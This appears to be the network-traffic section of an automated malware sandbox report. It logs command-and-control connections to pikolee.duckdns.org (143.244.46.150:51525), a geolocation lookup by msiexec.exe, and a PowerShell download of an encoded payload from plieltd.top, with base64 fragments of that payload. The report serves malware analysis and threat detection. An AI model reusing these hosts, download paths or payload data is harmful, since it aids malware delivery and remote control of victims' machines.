                                                                                                  Oct 22, 2024 09:40:46.942866087 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.942924023 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.942934990 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.942960978 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.942981958 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.942991018 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.943068981 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.943078041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.943105936 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.990848064 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.990860939 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.990869999 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.990900993 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.990935087 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.996705055 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996716022 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996725082 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996735096 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996750116 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.996778011 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.996908903 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996934891 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996944904 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.996968031 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997070074 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997107029 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997163057 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997231960 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997251034 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997267008 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997426033 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997459888 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997591972 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997663975 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997673988 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997684956 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997699976 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997725964 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997823954 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997834921 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997844934 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997854948 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.997869015 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.997890949 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.998353958 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998393059 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998404026 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998429060 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:46.998621941 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998631001 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:46.998709917 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.018795967 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018805981 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018815041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018830061 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018841982 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018852949 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.018860102 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.018896103 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.059910059 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.059921026 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.059926987 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.060087919 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.106796026 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.106807947 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.106816053 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.106852055 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.107696056 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.107737064 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.107798100 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.107808113 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.107846022 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.113701105 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113711119 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113719940 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113749027 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.113810062 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113818884 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113828897 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113838911 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.113842964 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.113862038 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114141941 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114152908 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114162922 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114171028 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114180088 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114208937 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114501953 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114536047 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114567041 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114576101 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114614964 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114818096 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114861012 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114871025 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114892006 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.114917994 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114927053 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:47.114953995 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:47.168297052 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:49.279479027 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:49.281456947 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:49.286798954 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.005728006 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:50.011163950 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011178017 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011188030 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011286974 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011296034 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011306047 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011346102 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:50.011364937 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011373997 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011383057 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.011431932 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016726017 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016791105 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016799927 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016819954 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016844034 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016879082 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.016887903 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.072010040 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:40:50.077802896 CEST5152549892143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:40:50.078102112 CEST4989251525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:41:19.291930914 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:41:19.294698000 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:41:19.300246000 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:41:49.324758053 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:41:49.330761909 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:41:49.336184025 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:42:19.352750063 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:42:19.354952097 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:42:19.360378027 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:42:25.027988911 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:25.340442896 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:25.949577093 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:27.152834892 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:29.558979034 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:34.371459007 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:43.980900049 CEST4989380192.168.2.6178.237.33.50
                                                                                                  Oct 22, 2024 09:42:49.361079931 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:42:49.364304066 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:42:49.369712114 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:43:19.382970095 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:43:19.386347055 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:43:19.391947031 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:43:49.385751009 CEST5152549881143.244.46.150192.168.2.6
                                                                                                  Oct 22, 2024 09:43:49.387995005 CEST4988151525192.168.2.6143.244.46.150
                                                                                                  Oct 22, 2024 09:43:49.393651009 CEST5152549881143.244.46.150192.168.2.6

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 22, 2024 09:40:03.918266058 CEST5533653192.168.2.61.1.1.1
                                                                                                  Oct 22, 2024 09:40:04.105952978 CEST53553361.1.1.1192.168.2.6
                                                                                                  Oct 22, 2024 09:40:41.080828905 CEST5871353192.168.2.61.1.1.1
                                                                                                  Oct 22, 2024 09:40:41.198081017 CEST53587131.1.1.1192.168.2.6
                                                                                                  Oct 22, 2024 09:40:43.025791883 CEST6273453192.168.2.61.1.1.1
                                                                                                  Oct 22, 2024 09:40:43.035059929 CEST53627341.1.1.1192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 22, 2024 09:40:03.918266058 CEST192.168.2.61.1.1.10x9c5Standard query (0)plieltd.topA (IP address)IN (0x0001)false
                                                                                                  Oct 22, 2024 09:40:41.080828905 CEST192.168.2.61.1.1.10xc925Standard query (0)pikolee.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                  Oct 22, 2024 09:40:43.025791883 CEST192.168.2.61.1.1.10x1f71Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 22, 2024 09:40:04.105952978 CEST1.1.1.1192.168.2.60x9c5No error (0)plieltd.top104.21.56.189A (IP address)IN (0x0001)false
                                                                                                  Oct 22, 2024 09:40:04.105952978 CEST1.1.1.1192.168.2.60x9c5No error (0)plieltd.top172.67.155.139A (IP address)IN (0x0001)false
                                                                                                  Oct 22, 2024 09:40:41.198081017 CEST1.1.1.1192.168.2.60xc925No error (0)pikolee.duckdns.org143.244.46.150A (IP address)IN (0x0001)false
                                                                                                  Oct 22, 2024 09:40:43.035059929 CEST1.1.1.1192.168.2.60x1f71No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • plieltd.top
                                                                                                  • geoplugin.net

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649893178.237.33.50802996C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 22, 2024 09:40:43.041161060 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                  Host: geoplugin.net
                                                                                                  Cache-Control: no-cache
                                                                                                  Oct 22, 2024 09:40:43.893595934 CEST1165INHTTP/1.1 200 OK
                                                                                                  date: Tue, 22 Oct 2024 07:40:43 GMT
                                                                                                  server: Apache
                                                                                                  content-length: 957
                                                                                                  content-type: application/json; charset=utf-8
                                                                                                  cache-control: public, max-age=300
                                                                                                  access-control-allow-origin: *
                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 33 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                  Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"3ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649710104.21.56.1894432912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-22 07:40:04 UTC173OUTGET /Kvalificeredes.qxd HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: plieltd.top
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-22 07:40:05 UTC908INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 22 Oct 2024 07:40:05 GMT
                                                                                                  Content-Length: 494580
                                                                                                  Connection: close
                                                                                                  Last-Modified: Tue, 22 Oct 2024 04:58:41 GMT
                                                                                                  ETag: "78bf4-625099f828847"
                                                                                                  Accept-Ranges: bytes
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iegvhFsMy1peo4qco0NBOBacs00OFOngdecYRpWFH1nvK1KPSd98p6kVTDbTn1X7tLy9nqP6drqnb%2FWNrUUwQjO2tdMI4JoR1XW8x23Mqz7B1X02pdxBrE5pdydE4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d67d6524d6e2e63-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=787&delivery_rate=2511708&cwnd=251&unsent_bytes=0&cid=9d57069326efec64&ts=517&x=0"
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 63 51 47 62 36 77 4a 56 73 37 73 30 50 78 63 41 63 51 47 62 36 77 4a 4a 77 41 4e 63 4a 41 54 72 41 73 73 57 63 51 47 62 75 5a 78 75 44 30 4c 72 41 67 57 74 36 77 4b 59 45 34 48 70 4c 4d 6b 48 35 58 45 42 6d 33 45 42 6d 34 48 42 6b 46 72 34 6f 75 73 43 56 4c 39 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 53 42 41 35 48 58 45 42 6d 2b 73 43 47 2b 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 6e 63 4b 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 57 48 4f 42 2b 59 78 44 42 51 4a 38 7a 75 73 43 73 44 72 72 41 68 61 77 69 30 51 6b 42 4f 73 43 4f 75 72 72 41 6d 48 56 69 63 4e 78 41 5a 76 72 41 6a 49 67 67 63 4f 37 31 4d 4d 41 36 77 4a 54 49 48 45 42 6d 37 70 46 4f 38 38 6f 36 77 4b 47 6a 58 45 42 6d 34 48
                                                                                                  Data Ascii: cQGb6wJVs7s0PxcAcQGb6wJJwANcJATrAssWcQGbuZxuD0LrAgWt6wKYE4HpLMkH5XEBm3EBm4HBkFr4ousCVL9xAZtxAZtxAZu6SBA5HXEBm+sCG+txAZtxAZsxynEBm+sCncKJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCWHOB+YxDBQJ8zusCsDrrAhawi0QkBOsCOurrAmHVicNxAZvrAjIggcO71MMA6wJTIHEBm7pFO88o6wKGjXEBm4H
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 2b 6c 4d 67 66 33 37 44 44 79 51 42 49 52 58 72 30 48 6c 6d 55 64 61 2f 42 54 43 71 67 47 64 52 34 76 6d 76 6b 4a 69 4f 55 63 66 35 76 30 5a 6c 4f 75 63 6b 6b 56 69 41 52 53 45 4d 59 6f 41 53 47 41 42 6e 53 31 6a 2f 69 69 50 59 67 47 64 72 31 6f 65 6d 45 66 6a 66 4f 6d 6d 74 41 47 64 53 4f 2b 46 51 45 64 69 69 42 68 33 59 77 47 64 49 5a 58 41 30 68 78 62 79 31 6f 44 52 67 6c 64 30 73 41 57 5a 63 59 57 4a 5a 57 54 54 48 54 34 78 68 59 6c 6c 53 4f 77 6b 41 4b 78 6f 42 67 63 41 30 59 4a 44 64 48 62 45 2f 57 38 75 45 66 6c 72 33 48 75 6d 55 66 72 58 49 57 75 67 67 47 64 52 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: +lMgf37DDyQBIRXr0HlmUda/BTCqgGdR4vmvkJiOUcf5v0ZlOuckkViARSEMYoASGABnS1j/iiPYgGdr1oemEfjfOmmtAGdSO+FQEdiiBh3YwGdIZXA0hxby1oDRgld0sAWZcYWJZWTTHT4xhYllSOwkAKxoBgcA0YJDdHbE/W8uEflr3HumUfrXIWuggGdRwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 31 48 59 67 36 64 6d 4f 38 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 73 73 56 63 72 68 52 4a 63 73 55 79 41 4d 7a 76 68 5a 31 48 59 72 74 55 78 6a 58 50 64 62 4f 39 42 5a 33 4f 35 79 47 63 52 32 49 4f 6e 56 66 6f 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 72 58 70 54 64 55 74 6c 65 4b 72 6a 47 2b 37 77 44 4f 53 52 71 44 55 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 53 4c 56 62 64 47 33 44 75 75 45 75 6b 56 69 41 63 76 35 64 2b 71 79 70 65 50 33 75 69 77 64 69 42 79 70 53 63 62 58 46 2b 50 33 6d 65 31 6e 47 68 52 42 32 4a 42 44 73 73 6c 4d 70 75 6c 6a 41
                                                                                                  Data Ascii: 1HYg6dmO8BnUdiAZ1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdissVcrhRJcsUyAMzvhZ1HYrtUxjXPdbO9BZ3O5yGcR2IOnVfoAZ1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdiAZ1HYrXpTdUtleKrjG+7wDOSRqDUnUdiAZ1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdiASLVbdG3DuuEukViAcv5d+qypeP3uiwdiBypScbXF+P3me1nGhRB2JBDsslMpuljA
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 4c 48 4b 7a 4c 63 56 73 46 34 38 4a 6d 46 63 56 46 48 4c 54 62 36 31 70 57 4e 4a 30 55 6f 57 73 66 41 48 36 55 64 59 6c 63 41 6e 30 6a 79 67 50 36 64 2f 58 55 47 46 30 7a 4e 55 43 6e 63 2b 41 32 78 74 46 51 71 67 69 53 39 52 30 31 36 4c 71 73 64 32 63 4f 68 73 68 46 42 59 45 51 52 73 51 50 57 36 4a 59 65 70 6a 41 58 54 6c 67 47 5a 54 43 72 78 7a 6a 38 75 6f 59 4a 75 44 50 2f 5a 2b 71 76 34 6a 6a 36 35 53 30 6c 62 51 63 74 5a 61 34 74 31 34 7a 6e 52 53 6d 59 78 41 41 77 70 4e 79 69 4b 64 51 55 56 5a 44 75 43 7a 33 47 6b 4c 35 62 31 2f 4d 57 53 36 6e 63 34 4f 68 62 77 2b 72 31 50 2f 6c 55 64 44 49 34 62 51 49 61 4e 77 47 4f 43 65 4a 6f 43 56 4d 2f 6f 56 66 48 75 4e 38 31 62 43 4d 41 5a 31 49 35 74 71 6f 52 57 4a 62 7a 73 7a 2f 61 35 39 48 59 76 4b 53 67 46
                                                                                                  Data Ascii: LHKzLcVsF48JmFcVFHLTb61pWNJ0UoWsfAH6UdYlcAn0jygP6d/XUGF0zNUCnc+A2xtFQqgiS9R016Lqsd2cOhshFBYEQRsQPW6JYepjAXTlgGZTCrxzj8uoYJuDP/Z+qv4jj65S0lbQctZa4t14znRSmYxAAwpNyiKdQUVZDuCz3GkL5b1/MWS6nc4Ohbw+r1P/lUdDI4bQIaNwGOCeJoCVM/oVfHuN81bCMAZ1I5tqoRWJbzsz/a59HYvKSgF
